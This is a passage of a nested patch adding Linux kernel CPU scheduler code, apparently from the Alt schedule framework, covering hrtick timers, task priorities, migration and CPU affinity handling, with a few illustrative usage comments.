++void wake_up_nohz_cpu(int cpu)
++{
++	if (!wake_up_full_nohz_cpu(cpu))
++		wake_up_idle_cpu(cpu);
++}
++
++static void nohz_csd_func(void *info)
++{
++	struct rq *rq = info;
++	int cpu = cpu_of(rq);
++	unsigned int flags;
++
++	/*
++	 * Release the rq::nohz_csd.
++	 */
++	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
++	WARN_ON(!(flags & NOHZ_KICK_MASK));
++
++	rq->idle_balance = idle_cpu(cpu);
++	if (rq->idle_balance && !need_resched()) {
++		rq->nohz_idle_balance = flags;
++		raise_softirq_irqoff(SCHED_SOFTIRQ);
++	}
++}
++
++#endif /* CONFIG_NO_HZ_COMMON */
++#endif /* CONFIG_SMP */
++
++static inline void check_preempt_curr(struct rq *rq)
++{
++	if (sched_rq_first_task(rq) != rq->curr)
++		resched_curr(rq);
++}
++
++#ifdef CONFIG_SCHED_HRTICK
++/*
++ * Use HR-timers to deliver accurate preemption points.
++ */
++
++static void hrtick_clear(struct rq *rq)
++{
++	if (hrtimer_active(&rq->hrtick_timer))
++		hrtimer_cancel(&rq->hrtick_timer);
++}
++
++/*
++ * High-resolution timer tick.
++ * Runs from hardirq context with interrupts disabled.
++ */
++static enum hrtimer_restart hrtick(struct hrtimer *timer)
++{
++	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
++
++	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
++
++	raw_spin_lock(&rq->lock);
++	resched_curr(rq);
++	raw_spin_unlock(&rq->lock);
++
++	return HRTIMER_NORESTART;
++}
++
++/*
++ * Use hrtick when:
++ *  - enabled by features
++ *  - hrtimer is actually high res
++ */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	/*
++	 * Alt schedule FW doesn't support sched_feat yet:
++	 *
++	 *	if (!sched_feat(HRTICK))
++	 *		return 0;
++	 */
++	if (!cpu_active(cpu_of(rq)))
++		return 0;
++	return hrtimer_is_hres_active(&rq->hrtick_timer);
++}
++
++#ifdef CONFIG_SMP
++
++static void __hrtick_restart(struct rq *rq)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	ktime_t time = rq->hrtick_time;
++
++	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
++}
++
++/*
++ * called from hardirq (IPI) context
++ */
++static void __hrtick_start(void *arg)
++{
++	struct rq *rq = arg;
++
++	raw_spin_lock(&rq->lock);
++	__hrtick_restart(rq);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	struct hrtimer *timer = &rq->hrtick_timer;
++	s64 delta;
++
++	/*
++	 * Don't schedule slices shorter than 10000ns; that just
++	 * doesn't make sense and can cause timer DoS.
++	 */
++	delta = max_t(s64, delay, 10000LL);
++
++	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
++
++	if (rq == this_rq())
++		__hrtick_restart(rq);
++	else
++		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
++}
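++
++/*
++ * Worked example: hrtick_start(rq, 5000) arms the timer 10000ns out
++ * because of the max_t() clamp above, while hrtick_start(rq, 2000000)
++ * arms it 2ms out unchanged; a remote rq takes the IPI path via
++ * smp_call_function_single_async().
++ */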
++
++#else
++/*
++ * Called to set the hrtick timer state.
++ *
++ * called with rq->lock held and irqs disabled
++ */
++void hrtick_start(struct rq *rq, u64 delay)
++{
++	/*
++	 * Don't schedule slices shorter than 10000ns; that just
++	 * doesn't make sense. Rely on vruntime for fairness.
++	 */
++	delay = max_t(u64, delay, 10000LL);
++	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
++		      HRTIMER_MODE_REL_PINNED_HARD);
++}
++#endif /* CONFIG_SMP */
++
++static void hrtick_rq_init(struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
++#endif
++
++	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
++	rq->hrtick_timer.function = hrtick;
++}
++#else	/* CONFIG_SCHED_HRTICK */
++static inline int hrtick_enabled(struct rq *rq)
++{
++	return 0;
++}
++
++static inline void hrtick_clear(struct rq *rq)
++{
++}
++
++static inline void hrtick_rq_init(struct rq *rq)
++{
++}
++#endif	/* CONFIG_SCHED_HRTICK */
++
++static inline int __normal_prio(int policy, int rt_prio, int static_prio)
++{
++	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
++		static_prio + MAX_PRIORITY_ADJ;
++}
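++
++/*
++ * Worked example: with MAX_RT_PRIO == 100, a SCHED_FIFO task with
++ * rt_prio 50 maps to 100 - 1 - 50 = 49, so a higher rt_prio yields a
++ * numerically lower (stronger) priority; a SCHED_NORMAL task at
++ * nice 0 keeps static_prio 120 plus the scheduler-specific
++ * MAX_PRIORITY_ADJ offset.
++ */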
++
++/*
++ * Calculate the expected normal priority: i.e. priority
++ * without taking RT-inheritance into account. Might be
++ * boosted by interactivity modifiers. Changes upon fork,
++ * setprio syscalls, and whenever the interactivity
++ * estimator recalculates.
++ */
++static inline int normal_prio(struct task_struct *p)
++{
++	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
++}
++
++/*
++ * Calculate the current priority, i.e. the priority
++ * taken into account by the scheduler. This value might
++ * be boosted by RT tasks as it will be RT if the task got
++ * RT-boosted. If not then it returns p->normal_prio.
++ */
++static int effective_prio(struct task_struct *p)
++{
++	p->normal_prio = normal_prio(p);
++	/*
++	 * If we are an RT task or were boosted to RT priority,
++	 * keep the priority unchanged. Otherwise, update priority
++	 * to the normal priority:
++	 */
++	if (!rt_prio(p->prio))
++		return p->normal_prio;
++	return p->prio;
++}
++
++/*
++ * activate_task - move a task to the runqueue.
++ *
++ * Context: rq->lock
++ */
++static void activate_task(struct task_struct *p, struct rq *rq)
++{
++	enqueue_task(p, rq, ENQUEUE_WAKEUP);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++
++	/*
++	 * If in_iowait is set, the code below may not trigger any cpufreq
++	 * utilization updates, so do it here explicitly with the IOWAIT flag
++	 * passed.
++	 */
++	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
++}
++
++/*
++ * deactivate_task - remove a task from the runqueue.
++ *
++ * Context: rq->lock
++ */
++static inline void deactivate_task(struct task_struct *p, struct rq *rq)
++{
++	dequeue_task(p, rq, DEQUEUE_SLEEP);
++	p->on_rq = 0;
++	cpufreq_update_util(rq, 0);
++}
++
++static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * After ->cpu is set to a new value, task_access_lock(p, ...) can be
++	 * successfully executed on another CPU. We must ensure that updates of
++	 * per-task data have been completed by this moment.
++	 */
++	smp_wmb();
++
++	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
++#endif
++}
++
++static inline bool is_migration_disabled(struct task_struct *p)
++{
++#ifdef CONFIG_SMP
++	return p->migration_disabled;
++#else
++	return false;
++#endif
++}
++
++#define SCA_CHECK		0x01
++#define SCA_USER		0x08
++
++#ifdef CONFIG_SMP
++
++void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
++{
++#ifdef CONFIG_SCHED_DEBUG
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * We should never call set_task_cpu() on a blocked task,
++	 * ttwu() will sort out the placement.
++	 */
++	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
++
++#ifdef CONFIG_LOCKDEP
++	/*
++	 * The caller should hold either p->pi_lock or rq->lock, when changing
++	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
++	 *
++	 * sched_move_task() holds both and thus holding either pins the cgroup,
++	 * see task_group().
++	 */
++	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
++				      lockdep_is_held(&task_rq(p)->lock)));
++#endif
++	/*
++	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
++	 */
++	WARN_ON_ONCE(!cpu_online(new_cpu));
++
++	WARN_ON_ONCE(is_migration_disabled(p));
++#endif
++	if (task_cpu(p) == new_cpu)
++		return;
++	trace_sched_migrate_task(p, new_cpu);
++	rseq_migrate(p);
++	perf_event_task_migrate(p);
++
++	__set_task_cpu(p, new_cpu);
++}
++
++#define MDF_FORCE_ENABLED	0x80
++
++static void
++__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	/*
++	 * This here violates the locking rules for affinity, since we're only
++	 * supposed to change these variables while holding both rq->lock and
++	 * p->pi_lock.
++	 *
++	 * HOWEVER, it magically works, because ttwu() is the only code that
++	 * accesses these variables under p->pi_lock and only does so after
++	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
++	 * before finish_task().
++	 *
++	 * XXX do further audits, this smells like something putrid.
++	 */
++	SCHED_WARN_ON(!p->on_cpu);
++	p->cpus_ptr = new_mask;
++}
++
++void migrate_disable(void)
++{
++	struct task_struct *p = current;
++	int cpu;
++
++	if (p->migration_disabled) {
++		p->migration_disabled++;
++		return;
++	}
++
++	preempt_disable();
++	cpu = smp_processor_id();
++	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
++		cpu_rq(cpu)->nr_pinned++;
++		p->migration_disabled = 1;
++		p->migration_flags &= ~MDF_FORCE_ENABLED;
++
++		/*
++		 * Violates locking rules! see comment in __do_set_cpus_ptr().
++		 */
++		if (p->cpus_ptr == &p->cpus_mask)
++			__do_set_cpus_ptr(p, cpumask_of(cpu));
++	}
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_disable);
++
++void migrate_enable(void)
++{
++	struct task_struct *p = current;
++
++	if (0 == p->migration_disabled)
++		return;
++
++	if (p->migration_disabled > 1) {
++		p->migration_disabled--;
++		return;
++	}
++
++	if (WARN_ON_ONCE(!p->migration_disabled))
++		return;
++
++	/*
++	 * Ensure stop_task runs either before or after this, and that
++	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
++	 */
++	preempt_disable();
++	/*
++	 * Assumption: current should be running on allowed cpu
++	 */
++	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
++	if (p->cpus_ptr != &p->cpus_mask)
++		__do_set_cpus_ptr(p, &p->cpus_mask);
++	/*
++	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
++	 * regular cpus_mask, otherwise things that race (eg.
++	 * select_fallback_rq) get confused.
++	 */
++	barrier();
++	p->migration_disabled = 0;
++	this_rq()->nr_pinned--;
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(migrate_enable);
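++
++/*
++ * Usage sketch (illustrative): migrate_disable() pins current to its
++ * CPU without disabling preemption, and sections nest; only the
++ * outermost migrate_enable() unpins:
++ *
++ *	migrate_disable();
++ *	cpu = smp_processor_id();
++ *	... cpu stays valid here even across preemption ...
++ *	migrate_enable();
++ */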
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return rq->nr_pinned;
++}
++
++/*
++ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
++ * __set_cpus_allowed_ptr() and select_fallback_rq().
++ */
++static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
++{
++	/* When not in the task's cpumask, no point in looking further. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/* migrate_disabled() must be allowed to finish. */
++	if (is_migration_disabled(p))
++		return cpu_online(cpu);
++
++	/* Non-kernel threads are not allowed during either online or offline. */
++	if (!(p->flags & PF_KTHREAD))
++		return cpu_active(cpu) && task_cpu_possible(cpu, p);
++
++	/* KTHREAD_IS_PER_CPU is always allowed. */
++	if (kthread_is_per_cpu(p))
++		return cpu_online(cpu);
++
++	/* Regular kernel threads don't get to stay during offline. */
++	if (cpu_dying(cpu))
++		return false;
++
++	/* But are allowed during online. */
++	return cpu_online(cpu);
++}
++
++/*
++ * This is how migration works:
++ *
++ * 1) we invoke migration_cpu_stop() on the target CPU using
++ *    stop_one_cpu().
++ * 2) stopper starts to run (implicitly forcing the migrated thread
++ *    off the CPU)
++ * 3) it checks whether the migrated task is still in the wrong runqueue.
++ * 4) if it's in the wrong runqueue then the migration thread removes
++ *    it and puts it into the right queue.
++ * 5) stopper completes and stop_one_cpu() returns and the migration
++ *    is done.
++ */
++
++/*
++ * move_queued_task - move a queued task to new rq.
++ *
++ * Returns (locked) new rq. Old rq's lock is released.
++ */
++static struct rq *move_queued_task(struct rq *rq, struct task_struct *p, int
++				   new_cpu)
++{
++	lockdep_assert_held(&rq->lock);
++
++	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
++	dequeue_task(p, rq, 0);
++	update_sched_preempt_mask(rq);
++	set_task_cpu(p, new_cpu);
++	raw_spin_unlock(&rq->lock);
++
++	rq = cpu_rq(new_cpu);
++
++	raw_spin_lock(&rq->lock);
++	WARN_ON_ONCE(task_cpu(p) != new_cpu);
++	sched_task_sanity_check(p, rq);
++	enqueue_task(p, rq, 0);
++	p->on_rq = TASK_ON_RQ_QUEUED;
++	check_preempt_curr(rq);
++
++	return rq;
++}
++
++struct migration_arg {
++	struct task_struct *task;
++	int dest_cpu;
++};
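++
++/*
++ * Flow sketch (illustrative): callers fill a migration_arg and hand it
++ * to the stopper thread of the task's CPU, as affine_move_task() below
++ * does:
++ *
++ *	struct migration_arg arg = { p, dest_cpu };
++ *
++ *	stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
++ */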
++
++/*
++ * Move (not current) task off this CPU, onto the destination CPU. We're doing
++ * this because either it can't run here any more (set_cpus_allowed()
++ * away from this CPU, or CPU going down), or because we're
++ * attempting to rebalance this task on exec (sched_exec).
++ *
++ * So we race with normal scheduler movements, but that's OK, as long
++ * as the task is no longer on this CPU.
++ */
++static struct rq *__migrate_task(struct rq *rq, struct task_struct *p, int
++				 dest_cpu)
++{
++	/* Affinity changed (again). */
++	if (!is_cpu_allowed(p, dest_cpu))
++		return rq;
++
++	update_rq_clock(rq);
++	return move_queued_task(rq, p, dest_cpu);
++}
++
++/*
++ * migration_cpu_stop - this will be executed by a highprio stopper thread
++ * and performs thread migration by bumping thread off CPU then
++ * 'pushing' onto another runqueue.
++ */
++static int migration_cpu_stop(void *data)
++{
++	struct migration_arg *arg = data;
++	struct task_struct *p = arg->task;
++	struct rq *rq = this_rq();
++	unsigned long flags;
++
++	/*
++	 * The original target CPU might have gone down and we might
++	 * be on another CPU but it doesn't matter.
++	 */
++	local_irq_save(flags);
++	/*
++	 * We need to explicitly wake pending tasks before running
++	 * __migrate_task() such that we will not miss enforcing cpus_ptr
++	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
++	 */
++	flush_smp_call_function_queue();
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++	/*
++	 * If task_rq(p) != rq, it cannot be migrated here, because we're
++	 * holding rq->lock, if p->on_rq == 0 it cannot get enqueued because
++	 * we're holding p->pi_lock.
++	 */
++	if (task_rq(p) == rq && task_on_rq_queued(p))
++		rq = __migrate_task(rq, p, arg->dest_cpu);
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++
++	return 0;
++}
++
++static inline void
++set_cpus_allowed_common(struct task_struct *p, const struct cpumask *new_mask)
++{
++	cpumask_copy(&p->cpus_mask, new_mask);
++	p->nr_cpus_allowed = cpumask_weight(new_mask);
++}
++
++static void
++__do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	lockdep_assert_held(&p->pi_lock);
++	set_cpus_allowed_common(p, new_mask);
++}
++
++void do_set_cpus_allowed(struct task_struct *p, const struct cpumask *new_mask)
++{
++	__do_set_cpus_allowed(p, new_mask);
++}
++
++int dup_user_cpus_ptr(struct task_struct *dst, struct task_struct *src,
++		      int node)
++{
++	if (!src->user_cpus_ptr)
++		return 0;
++
++	dst->user_cpus_ptr = kmalloc_node(cpumask_size(), GFP_KERNEL, node);
++	if (!dst->user_cpus_ptr)
++		return -ENOMEM;
++
++	cpumask_copy(dst->user_cpus_ptr, src->user_cpus_ptr);
++	return 0;
++}
++
++static inline struct cpumask *clear_user_cpus_ptr(struct task_struct *p)
++{
++	struct cpumask *user_mask = NULL;
++
++	swap(p->user_cpus_ptr, user_mask);
++
++	return user_mask;
++}
++
++void release_user_cpus_ptr(struct task_struct *p)
++{
++	kfree(clear_user_cpus_ptr(p));
++}
++
++#endif
++
++/**
++ * task_curr - is this task currently executing on a CPU?
++ * @p: the task in question.
++ *
++ * Return: 1 if the task is currently executing. 0 otherwise.
++ */
++inline int task_curr(const struct task_struct *p)
++{
++	return cpu_curr(task_cpu(p)) == p;
++}
++
++#ifdef CONFIG_SMP
++/*
++ * wait_task_inactive - wait for a thread to unschedule.
++ *
++ * Wait for the thread to block in any of the states set in @match_state.
++ * If it changes, i.e. @p might have woken up, then return zero.  When we
++ * succeed in waiting for @p to be off its CPU, we return a positive number
++ * (its total switch count).  If a second call a short while later returns the
++ * same number, the caller can be sure that @p has remained unscheduled the
++ * whole time.
++ *
++ * The caller must ensure that the task *will* unschedule sometime soon,
++ * else this function might spin for a *long* time. This function can't
++ * be called with interrupts off, or it may introduce deadlock with
++ * smp_call_function() if an IPI is sent by the same process we are
++ * waiting to become inactive.
++ */
++unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
++{
++	unsigned long flags;
++	bool running, on_rq;
++	unsigned long ncsw;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	for (;;) {
++		rq = task_rq(p);
++
++		/*
++		 * If the task is actively running on another CPU
++		 * still, just relax and busy-wait without holding
++		 * any locks.
++		 *
++		 * NOTE! Since we don't hold any locks, it's not
++		 * even sure that "rq" stays as the right runqueue!
++		 * But we don't care, since this will return false
++		 * if the runqueue has changed and p is actually now
++		 * running somewhere else!
++		 */
++		while (task_on_cpu(p) && p == rq->curr) {
++			if (!(READ_ONCE(p->__state) & match_state))
++				return 0;
++			cpu_relax();
++		}
++
++		/*
++		 * Ok, time to look more closely! We need the rq
++		 * lock now, to be *sure*. If we're wrong, we'll
++		 * just go back and repeat.
++		 */
++		task_access_lock_irqsave(p, &lock, &flags);
++		trace_sched_wait_task(p);
++		running = task_on_cpu(p);
++		on_rq = p->on_rq;
++		ncsw = 0;
++		if (READ_ONCE(p->__state) & match_state)
++			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
++		task_access_unlock_irqrestore(p, lock, &flags);
++
++		/*
++		 * If it changed from the expected state, bail out now.
++		 */
++		if (unlikely(!ncsw))
++			break;
++
++		/*
++		 * Was it really running after all now that we
++		 * checked with the proper locks actually held?
++		 *
++		 * Oops. Go back and try again..
++		 */
++		if (unlikely(running)) {
++			cpu_relax();
++			continue;
++		}
++
++		/*
++		 * It's not enough that it's not actively running,
++		 * it must be off the runqueue _entirely_, and not
++		 * preempted!
++		 *
++		 * So if it was still runnable (but just not actively
++		 * running right now), it's preempted, and we should
++		 * yield - it could be a while.
++		 */
++		if (unlikely(on_rq)) {
++			ktime_t to = NSEC_PER_SEC / HZ;
++
++			set_current_state(TASK_UNINTERRUPTIBLE);
++			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
++			continue;
++		}
++
++		/*
++		 * Ahh, all good. It wasn't running, and it wasn't
++		 * runnable, which means that it will never become
++		 * running in the future either. We're all done!
++		 */
++		break;
++	}
++
++	return ncsw;
++}
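++
++/*
++ * Usage sketch (illustrative): the returned context-switch count lets
++ * a caller verify that @p stayed off-CPU between two probes:
++ *
++ *	unsigned long ncsw = wait_task_inactive(p, TASK_UNINTERRUPTIBLE);
++ *
++ *	...
++ *	if (ncsw && wait_task_inactive(p, TASK_UNINTERRUPTIBLE) == ncsw)
++ *		... p was never scheduled in between ...
++ */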
++
++/**
++ * kick_process - kick a running thread to enter/exit the kernel
++ * @p: the to-be-kicked thread
++ *
++ * Cause a process which is running on another CPU to enter
++ * kernel-mode, without any delay. (to get signals handled.)
++ *
++ * NOTE: this function doesn't have to take the runqueue lock,
++ * because all it wants to ensure is that the remote task enters
++ * the kernel. If the IPI races and the task has been migrated
++ * to another CPU then no harm is done and the purpose has been
++ * achieved as well.
++ */
++void kick_process(struct task_struct *p)
++{
++	int cpu;
++
++	preempt_disable();
++	cpu = task_cpu(p);
++	if ((cpu != smp_processor_id()) && task_curr(p))
++		smp_send_reschedule(cpu);
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(kick_process);
++
++/*
++ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
++ *
++ * A few notes on cpu_active vs cpu_online:
++ *
++ *  - cpu_active must be a subset of cpu_online
++ *
++ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
++ *    see __set_cpus_allowed_ptr(). At this point the newly online
++ *    CPU isn't yet part of the sched domains, and balancing will not
++ *    see it.
++ *
++ *  - on cpu-down we clear cpu_active() to mask the sched domains and
++ *    prevent the load balancer from placing new tasks on the to-be-removed
++ *    CPU. Existing tasks will remain running there and will be taken
++ *    off.
++ *
++ * This means that fallback selection must not select !active CPUs.
++ * And can assume that any active CPU must be online. Conversely
++ * select_task_rq() below may allow selection of !active CPUs in order
++ * to satisfy the above rules.
++ */
++static int select_fallback_rq(int cpu, struct task_struct *p)
++{
++	int nid = cpu_to_node(cpu);
++	const struct cpumask *nodemask = NULL;
++	enum { cpuset, possible, fail } state = cpuset;
++	int dest_cpu;
++
++	/*
++	 * If the node that the CPU is on has been offlined, cpu_to_node()
++	 * will return -1. There is no CPU on the node, and we should
++	 * select a CPU on another node.
++	 */
++	if (nid != -1) {
++		nodemask = cpumask_of_node(nid);
++
++		/* Look for allowed, online CPU in same node. */
++		for_each_cpu(dest_cpu, nodemask) {
++			if (is_cpu_allowed(p, dest_cpu))
++				return dest_cpu;
++		}
++	}
++
++	for (;;) {
++		/* Any allowed, online CPU? */
++		for_each_cpu(dest_cpu, p->cpus_ptr) {
++			if (!is_cpu_allowed(p, dest_cpu))
++				continue;
++			goto out;
++		}
++
++		/* No more Mr. Nice Guy. */
++		switch (state) {
++		case cpuset:
++			if (cpuset_cpus_allowed_fallback(p)) {
++				state = possible;
++				break;
++			}
++			fallthrough;
++		case possible:
++			/*
++			 * XXX When called from select_task_rq() we only
++			 * hold p->pi_lock and again violate locking order.
++			 *
++			 * More yuck to audit.
++			 */
++			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
++			state = fail;
++			break;
++
++		case fail:
++			BUG();
++			break;
++		}
++	}
++
++out:
++	if (state != cpuset) {
++		/*
++		 * Don't tell them about moving exiting tasks or
++		 * kernel threads (both mm NULL), since they never
++		 * leave kernel.
++		 */
++		if (p->mm && printk_ratelimit()) {
++			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
++					task_pid_nr(p), p->comm, cpu);
++		}
++	}
++
++	return dest_cpu;
++}
++
++static inline void
++sched_preempt_mask_flush(cpumask_t *mask, int prio)
++{
++	int cpu;
++
++	cpumask_copy(mask, sched_idle_mask);
++
++	for_each_cpu_not(cpu, mask) {
++		if (prio < cpu_rq(cpu)->prio)
++			cpumask_set_cpu(cpu, mask);
++	}
++}
++
++static inline int
++preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
++{
++	int task_prio = task_sched_prio(p);
++	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
++	int pr = atomic_read(&sched_prio_record);
++
++	if (pr != task_prio) {
++		sched_preempt_mask_flush(mask, task_prio);
++		atomic_set(&sched_prio_record, task_prio);
++	}
++
++	return cpumask_and(preempt_mask, allow_mask, mask);
++}
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	cpumask_t allow_mask, mask;
++
++	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
++		return select_fallback_rq(task_cpu(p), p);
++
++	if (
++#ifdef CONFIG_SCHED_SMT
++	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
++#endif
++	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
++	    preempt_mask_check(p, &allow_mask, &mask))
++		return best_mask_cpu(task_cpu(p), &mask);
++
++	return best_mask_cpu(task_cpu(p), &allow_mask);
++}
++
++void sched_set_stop_task(int cpu, struct task_struct *stop)
++{
++	static struct lock_class_key stop_pi_lock;
++	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
++	struct sched_param start_param = { .sched_priority = 0 };
++	struct task_struct *old_stop = cpu_rq(cpu)->stop;
++
++	if (stop) {
++		/*
++		 * Make it appear like a SCHED_FIFO task; it's something
++		 * userspace knows about and won't get confused about.
++		 *
++		 * Also, it will make PI more or less work without too
++		 * much confusion -- but then, stop work should not
++		 * rely on PI working anyway.
++		 */
++		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
++
++		/*
++		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
++		 * adjust the effective priority of a task. As a result,
++		 * rt_mutex_setprio() can trigger (RT) balancing operations,
++		 * which can then trigger wakeups of the stop thread to push
++		 * around the current task.
++		 *
++		 * The stop task itself will never be part of the PI-chain, it
++		 * never blocks, therefore that ->pi_lock recursion is safe.
++		 * Tell lockdep about this by placing the stop->pi_lock in its
++		 * own class.
++		 */
++		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
++	}
++
++	cpu_rq(cpu)->stop = stop;
++
++	if (old_stop) {
++		/*
++		 * Reset it back to a normal scheduling policy so that
++		 * it can die in pieces.
++		 */
++		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
++	}
++}
++
++static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
++			    raw_spinlock_t *lock, unsigned long irq_flags)
++{
++	/* Can the task run on the task's current CPU? If so, we're done */
++	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
++		if (p->migration_disabled) {
++			if (likely(p->cpus_ptr != &p->cpus_mask))
++				__do_set_cpus_ptr(p, &p->cpus_mask);
++			p->migration_disabled = 0;
++			p->migration_flags |= MDF_FORCE_ENABLED;
++			/* When p is migrate_disabled, rq->lock should be held */
++			rq->nr_pinned--;
++		}
++
++		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
++			struct migration_arg arg = { p, dest_cpu };
++
++			/* Need help from migration thread: drop lock and wait. */
++			__task_access_unlock(p, lock);
++			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
++			return 0;
++		}
++		if (task_on_rq_queued(p)) {
++			/*
++			 * OK, since we're going to drop the lock immediately
++			 * afterwards anyway.
++			 */
++			update_rq_clock(rq);
++			rq = move_queued_task(rq, p, dest_cpu);
++			lock = &rq->lock;
++		}
++	}
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	return 0;
++}
++
++static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
++					 const struct cpumask *new_mask,
++					 u32 flags,
++					 struct rq *rq,
++					 raw_spinlock_t *lock,
++					 unsigned long irq_flags)
++{
++	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
++	const struct cpumask *cpu_valid_mask = cpu_active_mask;
++	bool kthread = p->flags & PF_KTHREAD;
++	struct cpumask *user_mask = NULL;
++	int dest_cpu;
++	int ret = 0;
++
++	if (kthread || is_migration_disabled(p)) {
++		/*
++		 * Kernel threads are allowed on online && !active CPUs,
++		 * however, during cpu-hot-unplug, even these might get pushed
++		 * away if not KTHREAD_IS_PER_CPU.
++		 *
++		 * Specifically, migration_disabled() tasks must not fail the
++		 * cpumask_any_and_distribute() pick below, esp. so on
++		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
++		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
++		 */
++		cpu_valid_mask = cpu_online_mask;
++	}
++
++	if (!kthread && !cpumask_subset(new_mask, cpu_allowed_mask)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	/*
++	 * Must re-check here, to close a race against __kthread_bind(),
++	 * sched_setaffinity() is not guaranteed to observe the flag.
++	 */
++	if ((flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	if (cpumask_equal(&p->cpus_mask, new_mask))
++		goto out;
++
++	dest_cpu = cpumask_any_and(cpu_valid_mask, new_mask);
++	if (dest_cpu >= nr_cpu_ids) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	__do_set_cpus_allowed(p, new_mask);
++
++	if (flags & SCA_USER)
++		user_mask = clear_user_cpus_ptr(p);
++
++	ret = affine_move_task(rq, p, dest_cpu, lock, irq_flags);
++
++	kfree(user_mask);
++
++	return ret;
++
++out:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++
++	return ret;
++}
++
++/*
++ * Change a given task's CPU affinity. Migrate the thread to a
++ * proper CPU and schedule it away if the CPU it's executing on
++ * is removed from the allowed bitmask.
++ *
++ * NOTE: the caller must have a valid reference to the task, the
++ * task must not exit() & deallocate itself prematurely. The
++ * call is not atomic; no spinlocks may be held.
++ */
++static int __set_cpus_allowed_ptr(struct task_struct *p,
++				  const struct cpumask *new_mask, u32 flags)
++{
++	unsigned long irq_flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	return __set_cpus_allowed_ptr_locked(p, new_mask, flags, rq, lock, irq_flags);
++}
++
